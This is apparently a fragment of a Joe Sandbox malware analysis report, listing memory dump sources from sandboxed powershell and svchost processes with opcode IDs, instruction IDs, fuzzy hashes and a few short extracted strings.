                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7391e24aa3c3f25796149c2c79e00db4e81d15834cc577ef364ebe0570756b61
                                                                                      • Instruction ID: 79dfb2a0af164100eea23269fa18d7dbac2108dd8a818025610566b27fd58252
                                                                                      • Opcode Fuzzy Hash: 7391e24aa3c3f25796149c2c79e00db4e81d15834cc577ef364ebe0570756b61
                                                                                      • Instruction Fuzzy Hash: F681F222B1FB8A9FEBB997A848755B47BD1EF61344B0A00FEC04DCB1E7D918AD058341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c039a981a9067b99a4208ae520e0a31342dd7d97bd1a920566ade8c3456945b
                                                                                      • Instruction ID: 05d15bb3564092ba595e99a1da2d7e2b1f1fc6c5c473a46d5298fd2ce6d120d7
                                                                                      • Opcode Fuzzy Hash: 9c039a981a9067b99a4208ae520e0a31342dd7d97bd1a920566ade8c3456945b
                                                                                      • Instruction Fuzzy Hash: 44617F77A0B69D9BEF129B6CDC790E83FA0EF11629B0902F3C4D84B0A3FD1525564681
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d87305a97756b29c1152ddcacc203a74f5564c1598dcce6352dba9875a4d0605
                                                                                      • Instruction ID: 12b772ebdbd26c4638e3cd4a7a0cf454fbee7e8cdef2a5d0a00fbd84e2ea0805
                                                                                      • Opcode Fuzzy Hash: d87305a97756b29c1152ddcacc203a74f5564c1598dcce6352dba9875a4d0605
                                                                                      • Instruction Fuzzy Hash: 7F514832B1EA4A9FEBA9DA9C442167477D2EFA1210B1A40BEC05DC73E3DE14EC018341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aff0bdf0be5fea841da5d32c25d3b61a49dfc24e9acd2ea394933911eda7d749
                                                                                      • Instruction ID: 8934d1c9d0b968f01c491d1b22840100ccbdd7f29016bfc04871320589fa0328
                                                                                      • Opcode Fuzzy Hash: aff0bdf0be5fea841da5d32c25d3b61a49dfc24e9acd2ea394933911eda7d749
                                                                                      • Instruction Fuzzy Hash: 66413932B1EA499FEBB9D6A85421AB477D1EF80720B0901BFD05DC72E7EA14AD018381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 11ce19c9bc131d1f526a9c5241f16a65e660df5944cdeb857c4fb57b4c5a4499
                                                                                      • Instruction ID: c6d1fb4dbc1c0b59f8d3f7af9735f65c817a18a09d76f0dfff0b94b43b6dbdb5
                                                                                      • Opcode Fuzzy Hash: 11ce19c9bc131d1f526a9c5241f16a65e660df5944cdeb857c4fb57b4c5a4499
                                                                                      • Instruction Fuzzy Hash: 66410671A0DA489FDB589F5C984A6E97BE1FB98310F00416FE459D3292DB30A946CBC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753164706.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b77d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6dac98604200c393c98e647892625d185fe30055cc27215072674b6e28b8a1ac
                                                                                      • Instruction ID: b7bed9361be1799ef5a304e989a6b7406d7dafa4244d5be5dbacdb14d4ce4c3c
                                                                                      • Opcode Fuzzy Hash: 6dac98604200c393c98e647892625d185fe30055cc27215072674b6e28b8a1ac
                                                                                      • Instruction Fuzzy Hash: 9C41297190EBC84FE7568B2898959523FF4EF52314B1606EFD088CB1B3D625F846C792
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aafe316e31fdb08e76280ed8858956a6c0661625db29398ed57ddbe463a22f3f
                                                                                      • Instruction ID: ae1dfb3f710950cf21532cad9298718c239646dce04d543a198f5ddc8f1756fa
                                                                                      • Opcode Fuzzy Hash: aafe316e31fdb08e76280ed8858956a6c0661625db29398ed57ddbe463a22f3f
                                                                                      • Instruction Fuzzy Hash: 9921073190C74C8FDB59DFAC984A7E97FF0EB9A321F04426BD448C3166DA74941ACB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0d4eda453162ee92275c1ba9dc9b9881f0ef511e90f6ce2e7a104b26de5f49d0
                                                                                      • Instruction ID: 971a4f58a07799a6de57ae131cae8abe9547f861cc1075dceca7947755caa6c6
                                                                                      • Opcode Fuzzy Hash: 0d4eda453162ee92275c1ba9dc9b9881f0ef511e90f6ce2e7a104b26de5f49d0
                                                                                      • Instruction Fuzzy Hash: 5421C522B1EA8A9FE7B9DA98446167467D1EF61210B5B40BED05DC73F2DE14EC018341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      • Opcode ID: abe62f876c907b5af29eec0647a68af4ac33f29e894dca7de240c20684f7bdb8
                                                                                      • Instruction ID: d9f6b687e1538f9b9fb3ca8710ee17cc56cf583dcb4952ed930c56c2f38f653f
                                                                                      • Opcode Fuzzy Hash: abe62f876c907b5af29eec0647a68af4ac33f29e894dca7de240c20684f7bdb8
                                                                                      • Instruction Fuzzy Hash: 9E31487790E9CD8FDF128F6C58650E53FA0EF16604B0A02FBD0E84B0A3FD6565568741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c51f059c52251024292e3863bd4a4389876aaae70c47b33cb4358dcb86cd151
                                                                                      • Instruction ID: dfc7208bf37ac653c26061c9d89bb8b5dd928c3c3906b3870d1a5c5ffa345a4e
                                                                                      • Opcode Fuzzy Hash: 9c51f059c52251024292e3863bd4a4389876aaae70c47b33cb4358dcb86cd151
                                                                                      • Instruction Fuzzy Hash: FF21C222F2E98A9FE7B9DA98446227467C1EF65210B4B40BED05DC72A2DE18EC058341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                                      • Instruction ID: d3ee35796e1b6bbed8ebd2979ad5e3984bc2754f9ec14729e52f4a8d6a9f4cca
                                                                                      • Opcode Fuzzy Hash: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                                      • Instruction Fuzzy Hash: 16110232F1F5499FE7B9D6989471AB477D0FF40720B4A00BEE02DC76A2DA18AD018340
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                      • API String ID: 0-2396788759
                                                                                      • Opcode ID: c28d86b4b5f6f04169fd1aa8350d5671e009043cf0e9a91a5d7983b12ee87e1f
                                                                                      • Instruction ID: 65a09a50aac1809405fc893608efb49bd095fef97e1e894cd74159bdec7f1da3
                                                                                      • Opcode Fuzzy Hash: c28d86b4b5f6f04169fd1aa8350d5671e009043cf0e9a91a5d7983b12ee87e1f
                                                                                      • Instruction Fuzzy Hash: 7841B262A0F6D75FEB6A476988790587FE0FF16B94B4A03F3C0D5CB0A3ED1929434242
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                      • API String ID: 0-1500707516
                                                                                      • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                      • Instruction ID: 698a88e157f5e3be547aa0b9edad8586613dc3d8c9d577c9a4451944f3587467
                                                                                      • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                      • Instruction Fuzzy Hash: DF21F6A7704466DED30A76ADBC189DC7380DB9427A38947F3E169CB583FD14A08746C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: X7MR
                                                                                      • API String ID: 0-3463121620
                                                                                      • Opcode ID: 7027410556bef9281c881145a3e48db6e189ae22dba6f9634d9a599198b4703c
                                                                                      • Instruction ID: add168d78b9264ad30b81a00340e59a755e48e2c55f1ac2cf250a14a5dd02242
                                                                                      • Opcode Fuzzy Hash: 7027410556bef9281c881145a3e48db6e189ae22dba6f9634d9a599198b4703c
                                                                                      • Instruction Fuzzy Hash: ABD15732A1FB8E9FEBA59BA858655B57BE0EF52310B0901FFD44DC70E3D918A905C341
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26f171ec96c838131793d3c87fa15292a03f583fdd2d95295149ced29e01f499
                                                                                      • Instruction ID: 81b71b770f79cfa880cf874363d84b16367049834170ccbdbc2a3101db4b4539
                                                                                      • Opcode Fuzzy Hash: 26f171ec96c838131793d3c87fa15292a03f583fdd2d95295149ced29e01f499
                                                                                      • Instruction Fuzzy Hash: 7AD19070A18A4D8FDF98DF58C465AE97BE1FF68340F1541AAD40DD72A6CB34E881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3942204f6c99aae6de48c7006d5ccda57e84a0be3bf4c12934c9d363bb234ae2
                                                                                      • Instruction ID: dbbad0e2d7f39abec3e7a916c79da928a25408cb2b833c0cb62992d8c57fe3cd
                                                                                      • Opcode Fuzzy Hash: 3942204f6c99aae6de48c7006d5ccda57e84a0be3bf4c12934c9d363bb234ae2
                                                                                      • Instruction Fuzzy Hash: CC514933B1EA8A9FEBA9DA9C542267477D1EFA5210B1A40BFC15DC72E3DE14EC058341
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd808eb81e60e6563a7ffd64c49d1c692a35ff369eb85ba6fe2133acae2a77ff
                                                                                      • Instruction ID: e57979f5fde9001bb2baf176d9ce591fbb3dc25d2e5db105bcb948a3b4116980
                                                                                      • Opcode Fuzzy Hash: bd808eb81e60e6563a7ffd64c49d1c692a35ff369eb85ba6fe2133acae2a77ff
                                                                                      • Instruction Fuzzy Hash: 49413732B1EA499FEBB9D6A85431AB477D1EF81720B0901BFD05DC72E7EA15AD018381
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                                      • Instruction ID: 96c0ac9101b0ca48e6db44437c2ff1c87884f1fd2b7ab5e85d54977e619b0df1
                                                                                      • Opcode Fuzzy Hash: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                                      • Instruction Fuzzy Hash: E041387190DB884FDB18DF5C9C0A6A87FE1FB99310F04416FE499C3292DA70A905CBC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2310158711.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8e1d5c82832ae70c34aabdfc8ac74f13fd8d5a24fa6fc24482527eca7ca531a
                                                                                      • Instruction ID: f1436f6af07fa9b8d672aebd7300835f117f586761703e5cb90fae405979e960
                                                                                      • Opcode Fuzzy Hash: d8e1d5c82832ae70c34aabdfc8ac74f13fd8d5a24fa6fc24482527eca7ca531a
                                                                                      • Instruction Fuzzy Hash: AD41E67150EBC44FD7569B2998919523FF0EF57220B1606DFE088CB1B3D625A84ACBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 128c2c91cef09f11c86ef780c886878d2f95ff304a84774f6b343c0341ef64bd
                                                                                      • Instruction ID: 7d1f0c7a4bae02c7a0ac6a8276c8c8f52d20798ad4ee0a98ac51c31ada040797
                                                                                      • Opcode Fuzzy Hash: 128c2c91cef09f11c86ef780c886878d2f95ff304a84774f6b343c0341ef64bd
                                                                                      • Instruction Fuzzy Hash: A421073190C74C8FDB59DFAC9C4A7E97FE0EB96321F04416BD048C3166DA74A81ACB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8022070178f3c59c60739a4cd9d6952b2979cb10bdf0166d6738d6342161f9f
                                                                                      • Instruction ID: 8d00e7c8002ad9fbd1e61d670bb8585223247ed125ef40fe981db99b24c1bc4e
                                                                                      • Opcode Fuzzy Hash: d8022070178f3c59c60739a4cd9d6952b2979cb10bdf0166d6738d6342161f9f
                                                                                      • Instruction Fuzzy Hash: 5021C222B2E98A9FE7B9DA98446227467C1EF71210B4B40BED05DC72A2DE14EC048341
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f77e97c7f7679db451d70ca16fe3be9b56e6832662ac24b940bf42ae2860632e
                                                                                      • Instruction ID: f37cceee77b0f48a050b46e5686a429f876790c1770679782158121e267a6483
                                                                                      • Opcode Fuzzy Hash: f77e97c7f7679db451d70ca16fe3be9b56e6832662ac24b940bf42ae2860632e
                                                                                      • Instruction Fuzzy Hash: 73110232B2F58A9FE7B5D7989475AB87BD0EF40620B4A00BED05DC72A6DA19AC008341
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                      • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                      • API String ID: 0-962139525
                                                                                      • Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                      • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                                                      • Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                      • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6d9983671ca29c58111c6e9c64fbe487f384237dd1dfc51eabe1099bbbe7263
                                                                                      • Instruction ID: 28a92143f5038ef471a414275f8142a95d715eb59d66b524aac9a97a5772807a
                                                                                      • Opcode Fuzzy Hash: b6d9983671ca29c58111c6e9c64fbe487f384237dd1dfc51eabe1099bbbe7263
                                                                                      • Instruction Fuzzy Hash: 3932B761B29A4D4FEB58FB7C98796B9B7D2FF98300F410579E01EC32D6DE28A9418341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d2d2f85e604c5130f445f81d53169034b32b7539cd66dd4787abffb76c2e3c3
                                                                                      • Instruction ID: 29ff8aa137b7ef19c3c1294bd9861f2cef6cc9ff57fa88e1c209338e9451aa59
                                                                                      • Opcode Fuzzy Hash: 6d2d2f85e604c5130f445f81d53169034b32b7539cd66dd4787abffb76c2e3c3
                                                                                      • Instruction Fuzzy Hash: 1332E861B29A494FE798FB7C98657B9B7D2FF9C340F4405B9E01EC32D6ED28A8018341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4680ae6bc16b7c6ace4410ffd5a52751e3bf205c4597f44c6ba50a0993f959f6
                                                                                      • Instruction ID: 9d7771a6ff46a2dd71d31c748caf1306f4ddaa879e014afd404babff091c04c3
                                                                                      • Opcode Fuzzy Hash: 4680ae6bc16b7c6ace4410ffd5a52751e3bf205c4597f44c6ba50a0993f959f6
                                                                                      • Instruction Fuzzy Hash: 1132C721B29E094FEB98FB7C98697B977D2FF98304F410579E01EC32D6DE28A9418741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95d180d345f184bea75e8e55b547fc308c6049048c830fe6aa92c7fd0fa021e8
                                                                                      • Instruction ID: cea667090fded9ea441cd48f5d7beb1dda4575fb0fa03f2371707543fe5e021d
                                                                                      • Opcode Fuzzy Hash: 95d180d345f184bea75e8e55b547fc308c6049048c830fe6aa92c7fd0fa021e8
                                                                                      • Instruction Fuzzy Hash: 91510210B1E6C94FEB5AABB858746657FE5DF8B219B0900FBE0D9C71E7DD081806C342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad8c6d54b51598b2a93486852fc52961cda00cb45a615a69a0d07ea85a0e1cd6
                                                                                      • Instruction ID: f9d0f338550b5d28f7f3e307ddb0ce9bbea050e6552b9d8af28042b8687d8e10
                                                                                      • Opcode Fuzzy Hash: ad8c6d54b51598b2a93486852fc52961cda00cb45a615a69a0d07ea85a0e1cd6
                                                                                      • Instruction Fuzzy Hash: 7B21E722F0E7AA4FEB16B7ACACB54D97FB0EF41214B0901B7D095CB0E3ED1864468340
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c442075fea06383d1a8dda80c84102b3e22d5792a3dd21ae05ba4d92bb78643
                                                                                      • Instruction ID: 1f8c14b5ce0bfaba193a02f294b3efba1c2c21b6468ded6ee0e4c4e2b68aeeae
                                                                                      • Opcode Fuzzy Hash: 2c442075fea06383d1a8dda80c84102b3e22d5792a3dd21ae05ba4d92bb78643
                                                                                      • Instruction Fuzzy Hash: D7615D22B1992A8FDB0AB7BCA8256ED7FA1EF85325F0401BBD119C71D3CD286446C3D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70dbd53c69ec15be96a2b9f8f99facd928a1d1396c3fc4ea350d5e9655b4cee7
                                                                                      • Instruction ID: 1f09695186de9eb5dd923c719af5f3cc35598892620adb2478ef859270c985d1
                                                                                      • Opcode Fuzzy Hash: 70dbd53c69ec15be96a2b9f8f99facd928a1d1396c3fc4ea350d5e9655b4cee7
                                                                                      • Instruction Fuzzy Hash: 65512721B1EA8A0FE356A77C98266B93FE1DF86224B0940FBD08DC71E7DC0C5C468352
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e20f59ecc5bf4bfcbc5f70d206417c3ac999ee426ef939d173d06428a5ff78a0
                                                                                      • Instruction ID: 46fb317b2976632bf118f827b81ad5c813305fa34efca144b972c669cf40ada8
                                                                                      • Opcode Fuzzy Hash: e20f59ecc5bf4bfcbc5f70d206417c3ac999ee426ef939d173d06428a5ff78a0
